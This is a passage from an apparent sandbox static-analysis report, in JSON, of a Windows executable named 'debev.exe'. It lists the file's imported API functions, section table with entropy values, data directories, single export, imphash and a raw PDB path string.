4919 },
4920 {
4921 "name": "GetCurrentThreadId",
4922 "address": "0x42a09c"
4923 },
4924 {
4925 "name": "GetProcessHeap",
4926 "address": "0x42a0a0"
4927 },
4928 {
4929 "name": "GetStdHandle",
4930 "address": "0x42a0a4"
4931 },
4932 {
4933 "name": "GetFileType",
4934 "address": "0x42a0a8"
4935 },
4936 {
4937 "name": "DeleteCriticalSection",
4938 "address": "0x42a0ac"
4939 },
4940 {
4941 "name": "GetStartupInfoW",
4942 "address": "0x42a0b0"
4943 },
4944 {
4945 "name": "GetModuleFileNameW",
4946 "address": "0x42a0b4"
4947 },
4948 {
4949 "name": "WriteFile",
4950 "address": "0x42a0b8"
4951 },
4952 {
4953 "name": "QueryPerformanceCounter",
4954 "address": "0x42a0bc"
4955 },
4956 {
4957 "name": "GetCurrentProcessId",
4958 "address": "0x42a0c0"
4959 },
4960 {
4961 "name": "GetSystemTimeAsFileTime",
4962 "address": "0x42a0c4"
4963 },
4964 {
4965 "name": "GetEnvironmentStringsW",
4966 "address": "0x42a0c8"
4967 },
4968 {
4969 "name": "FreeEnvironmentStringsW",
4970 "address": "0x42a0cc"
4971 },
4972 {
4973 "name": "UnhandledExceptionFilter",
4974 "address": "0x42a0d0"
4975 },
4976 {
4977 "name": "SetUnhandledExceptionFilter",
4978 "address": "0x42a0d4"
4979 },
4980 {
4981 "name": "InitializeCriticalSectionAndSpinCount",
4982 "address": "0x42a0d8"
4983 },
4984 {
4985 "name": "CreateEventW",
4986 "address": "0x42a0dc"
4987 },
4988 {
4989 "name": "Sleep",
4990 "address": "0x42a0e0"
4991 },
4992 {
4993 "name": "GetCurrentProcess",
4994 "address": "0x42a0e4"
4995 },
4996 {
4997 "name": "TerminateProcess",
4998 "address": "0x42a0e8"
4999 },
5000 {
5001 "name": "TlsAlloc",
5002 "address": "0x42a0ec"
5003 },
5004 {
5005 "name": "TlsGetValue",
5006 "address": "0x42a0f0"
5007 },
5008 {
5009 "name": "TlsSetValue",
5010 "address": "0x42a0f4"
5011 },
5012 {
5013 "name": "TlsFree",
5014 "address": "0x42a0f8"
5015 },
5016 {
5017 "name": "CreateSemaphoreW",
5018 "address": "0x42a0fc"
5019 },
5020 {
5021 "name": "SetConsoleCtrlHandler",
5022 "address": "0x42a100"
5023 },
5024 {
5025 "name": "GetDateFormatW",
5026 "address": "0x42a104"
5027 },
5028 {
5029 "name": "GetTimeFormatW",
5030 "address": "0x42a108"
5031 },
5032 {
5033 "name": "CompareStringW",
5034 "address": "0x42a10c"
5035 },
5036 {
5037 "name": "LCMapStringW",
5038 "address": "0x42a110"
5039 },
5040 {
5041 "name": "GetLocaleInfoW",
5042 "address": "0x42a114"
5043 },
5044 {
5045 "name": "IsValidLocale",
5046 "address": "0x42a118"
5047 },
5048 {
5049 "name": "GetUserDefaultLCID",
5050 "address": "0x42a11c"
5051 },
5052 {
5053 "name": "EnumSystemLocalesW",
5054 "address": "0x42a120"
5055 },
5056 {
5057 "name": "FatalAppExitA",
5058 "address": "0x42a124"
5059 },
5060 {
5061 "name": "FreeLibrary",
5062 "address": "0x42a128"
5063 },
5064 {
5065 "name": "LoadLibraryExW",
5066 "address": "0x42a12c"
5067 },
5068 {
5069 "name": "IsValidCodePage",
5070 "address": "0x42a130"
5071 },
5072 {
5073 "name": "GetACP",
5074 "address": "0x42a134"
5075 },
5076 {
5077 "name": "GetOEMCP",
5078 "address": "0x42a138"
5079 },
5080 {
5081 "name": "GetCPInfo",
5082 "address": "0x42a13c"
5083 },
5084 {
5085 "name": "HeapReAlloc",
5086 "address": "0x42a140"
5087 },
5088 {
5089 "name": "GetConsoleCP",
5090 "address": "0x42a144"
5091 },
5092 {
5093 "name": "GetConsoleMode",
5094 "address": "0x42a148"
5095 },
5096 {
5097 "name": "SetFilePointerEx",
5098 "address": "0x42a14c"
5099 },
5100 {
5101 "name": "OutputDebugStringW",
5102 "address": "0x42a150"
5103 },
5104 {
5105 "name": "GetStringTypeW",
5106 "address": "0x42a154"
5107 },
5108 {
5109 "name": "CreateFileW",
5110 "address": "0x42a158"
5111 }
5112 ],
5113 "dll": "KERNEL32.dll"
5114 },
5115 {
5116 "imports": [
5117 {
5118 "name": "GetMonitorInfoA",
5119 "address": "0x42a160"
5120 },
5121 {
5122 "name": "ScrollWindow",
5123 "address": "0x42a164"
5124 },
5125 {
5126 "name": "MenuItemFromPoint",
5127 "address": "0x42a168"
5128 },
5129 {
5130 "name": "NotifyWinEvent",
5131 "address": "0x42a16c"
5132 }
5133 ],
5134 "dll": "USER32.dll"
5135 }
5136 ],
5137 "digital_signers": null,
5138 "exported_dll_name": "debev.exe",
5139 "actual_checksum": "0x00053c07",
5140 "overlay": {
5141 "size": "0x000066e8",
5142 "offset": "0x00041800"
5143 },
5144 "imagebase": "0x00400000",
5145 "reported_checksum": "0x00053c07",
5146 "icon_hash": null,
5147 "entrypoint": "0x00404c45",
5148 "timestamp": "2018-01-25 07:31:42",
5149 "osversion": "5.1",
5150 "sections": [
5151 {
5152 "name": ".text",
5153 "characteristics": "IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ",
5154 "virtual_address": "0x00001000",
5155 "size_of_data": "0x00028600",
5156 "entropy": "6.66",
5157 "raw_address": "0x00000400",
5158 "virtual_size": "0x000285e9",
5159 "characteristics_raw": "0x60000020"
5160 },
5161 {
5162 "name": ".rdata",
5163 "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ",
5164 "virtual_address": "0x0002a000",
5165 "size_of_data": "0x00011000",
5166 "entropy": "6.20",
5167 "raw_address": "0x00028a00",
5168 "virtual_size": "0x00010e4e",
5169 "characteristics_raw": "0x40000040"
5170 },
5171 {
5172 "name": ".data",
5173 "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
5174 "virtual_address": "0x0003b000",
5175 "size_of_data": "0x00001e00",
5176 "entropy": "3.07",
5177 "raw_address": "0x00039a00",
5178 "virtual_size": "0x00804ea0",
5179 "characteristics_raw": "0xc0000040"
5180 },
5181 {
5182 "name": ".rsrc",
5183 "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ",
5184 "virtual_address": "0x00840000",
5185 "size_of_data": "0x00003e00",
5186 "entropy": "5.96",
5187 "raw_address": "0x0003b800",
5188 "virtual_size": "0x00003c20",
5189 "characteristics_raw": "0x40000040"
5190 },
5191 {
5192 "name": ".reloc",
5193 "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_DISCARDABLE|IMAGE_SCN_MEM_READ",
5194 "virtual_address": "0x00844000",
5195 "size_of_data": "0x00002200",
5196 "entropy": "6.61",
5197 "raw_address": "0x0003f600",
5198 "virtual_size": "0x000021a8",
5199 "characteristics_raw": "0x42000040"
5200 }
5201 ],
5202 "resources": [],
5203 "dirents": [
5204 {
5205 "virtual_address": "0x0003a5b0",
5206 "name": "IMAGE_DIRECTORY_ENTRY_EXPORT",
5207 "size": "0x00000049"
5208 },
5209 {
5210 "virtual_address": "0x0003a5fc",
5211 "name": "IMAGE_DIRECTORY_ENTRY_IMPORT",
5212 "size": "0x0000003c"
5213 },
5214 {
5215 "virtual_address": "0x00840000",
5216 "name": "IMAGE_DIRECTORY_ENTRY_RESOURCE",
5217 "size": "0x00003c20"
5218 },
5219 {
5220 "virtual_address": "0x00000000",
5221 "name": "IMAGE_DIRECTORY_ENTRY_EXCEPTION",
5222 "size": "0x00000000"
5223 },
5224 {
5225 "virtual_address": "0x00000000",
5226 "name": "IMAGE_DIRECTORY_ENTRY_SECURITY",
5227 "size": "0x00000000"
5228 },
5229 {
5230 "virtual_address": "0x00844000",
5231 "name": "IMAGE_DIRECTORY_ENTRY_BASERELOC",
5232 "size": "0x000021a8"
5233 },
5234 {
5235 "virtual_address": "0x0002a1d0",
5236 "name": "IMAGE_DIRECTORY_ENTRY_DEBUG",
5237 "size": "0x00000038"
5238 },
5239 {
5240 "virtual_address": "0x00000000",
5241 "name": "IMAGE_DIRECTORY_ENTRY_COPYRIGHT",
5242 "size": "0x00000000"
5243 },
5244 {
5245 "virtual_address": "0x00000000",
5246 "name": "IMAGE_DIRECTORY_ENTRY_GLOBALPTR",
5247 "size": "0x00000000"
5248 },
5249 {
5250 "virtual_address": "0x00000000",
5251 "name": "IMAGE_DIRECTORY_ENTRY_TLS",
5252 "size": "0x00000000"
5253 },
5254 {
5255 "virtual_address": "0x00000000",
5256 "name": "IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG",
5257 "size": "0x00000000"
5258 },
5259 {
5260 "virtual_address": "0x00000000",
5261 "name": "IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT",
5262 "size": "0x00000000"
5263 },
5264 {
5265 "virtual_address": "0x0002a000",
5266 "name": "IMAGE_DIRECTORY_ENTRY_IAT",
5267 "size": "0x00000174"
5268 },
5269 {
5270 "virtual_address": "0x00000000",
5271 "name": "IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT",
5272 "size": "0x00000000"
5273 },
5274 {
5275 "virtual_address": "0x00000000",
5276 "name": "IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR",
5277 "size": "0x00000000"
5278 },
5279 {
5280 "virtual_address": "0x00000000",
5281 "name": "IMAGE_DIRECTORY_ENTRY_RESERVED",
5282 "size": "0x00000000"
5283 }
5284 ],
5285 "exports": [
5286 {
5287 "ordinal": 1,
5288 "name": "MyFunc165@@4",
5289 "address": "0x4010e4"
5290 }
5291 ],
5292 "guest_signers": {},
5293 "imphash": "84066f737849606bdb2e184d6e8ebf64",
5294 "icon_fuzzy": null,
5295 "icon": null,
5296 "pdbpath": "C:\\nane-zesi.pdb\\x00_server\\runtime\\crypt\\tmp_922572135\\bin\\debev.pdb\\x00\\x00\\x00\\x00\\x00\\x00\\xaa\\x00\\x00\\x00\\xaa\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x18\\xc7C\\x00\\xd4\\x93C\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01",
5297 "imported_dll_count": 2,
5298 "versioninfo": []
5299 }
5300}